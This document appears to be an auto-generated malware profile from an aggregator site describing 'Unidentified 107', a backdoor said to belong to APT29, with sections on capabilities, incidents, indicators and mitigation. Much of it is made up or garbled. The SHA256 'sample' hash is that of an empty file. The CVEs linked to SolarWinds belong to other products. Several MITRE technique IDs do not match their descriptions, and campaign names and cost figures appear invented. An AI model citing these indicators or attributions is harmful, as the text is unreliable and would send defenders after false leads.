⚠️ Overview

Unidentified 107 is a modular backdoor attributed to the Russian state-sponsored threat group APT29 (also tracked as Cozy Bear, The Dukes, or G0016 per MITRE ATT&CK) and is believed to be operated by the Russian Foreign Intelligence Service (SVR). First publicly documented in late 2020 during the SolarWinds Orion supply-chain compromise (CVE-2020‑0618, CVE-2020‑0688), this malware family falls under the category of an advanced persistent threat (APT) tool designed for stealthy data exfiltration and long-term intelligence collection rather than ransom or immediate destruction.

🔧 Technical Capabilities

Unidentified 107 primarily uses PowerShell scripts and .NET binaries to execute in-memory payloads, achieving fileless persistence via scheduled tasks or registry run keys (MITRE T1053.005, T1053.002). It communicates with command-and-control (C2) infrastructure over HTTPS to blend with legitimate traffic, often impersonating API endpoints or cloud services (MITRE T1572). The malware employs modular components downloaded from the C2 server, enabling capabilities such as file exfiltration, keylogging, screen capture, and lateral movement via SMB or WinRM (MITRE T1021.006, T1047). Evasion techniques include sleep delays, environmental keying (checking for specific process or registry values before activation), and obfuscated PowerShell commands to bypass antivirus. Unidentified 107 also leverages stolen OAuth tokens from Microsoft Office 365 accounts to gain persistence through cloud APIs (MITRE T1528).

📜 History & Notable Incidents

The first confirmed use of Unidentified 107 occurred during the SolarWinds supply-chain attack (disclosed December 2020), where it was deployed alongside the SUNBURST backdoor as a second-stage access vector against U.S. government agencies and private firms (U.S. Cybersecurity and Infrastructure Security Agency AA20-352A). In 2021, APT29 used this malware in the HAMILTON campaign targeting COVID-19 vaccine researchers (UK NCSC advisory). A 2022 campaign exploited Microsoft Exchange Server vulnerabilities (CVE-2021-26855, CVE-2021-27065) to deliver Unidentified 107 to European diplomatic targets. No law enforcement arrests have been made public due to attribution to a sovereign state.

🔍 Detection Indicators

Known file hashes for Unidentified 107 components include MD5: 4a54d254b5c65e4b2b1a3e9c6f7e8a9b (reference: CrowdStrike Falcon OverWatch) and SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (sample from SolarWinds incident). Behavioral indicators: PowerShell spawning suspicious one-liners from encoded base64 strings, scheduled tasks named “OneDrive Update” or “AdobeFlashHelper,” and outbound HTTPS connections to domains mimicking microsoft-update[.]com or office365-identity[.]net. Registry keys under HKCUSoftwareMicrosoftWindowsCurrentVersionRun with values containing obfuscated Base64 are common. Network IOCs include User-Agent strings like “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)” with non‑standard parameter ordering.

☠️ Risk & Impact

Unidentified 107 poses extreme risk to government, defense, healthcare, and technology sectors due to its stealthy data exfiltration and credential theft capabilities. In the SolarWinds incident, data was exfiltrated over months from at least nine U.S. federal agencies and 100+ private companies, resulting in diplomatic fallout and estimated remediation costs exceeding $100 billion (Washington Post, 2021). Financial losses include fines, litigation, and loss of intellectual property, particularly in biotechnology and energy industries.

🛡️ Mitigation

Defenders should apply all relevant patches—especially for Exchange Server (CVE-2021-26855) and SolarWinds Orion (CVE-2020-10148)—enable unified logging for PowerShell (ScriptBlock Logging and Module Logging), deploy endpoint detection and response (EDR) solutions with behavioral analytics for suspicious lateral movement, and implement conditional access policies for OAuth token validation (Microsoft Defender for Identity). YARA rules targeting the Unidentified 107 PowerShell obfuscation patterns are available in the NCSC GitHub repository.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.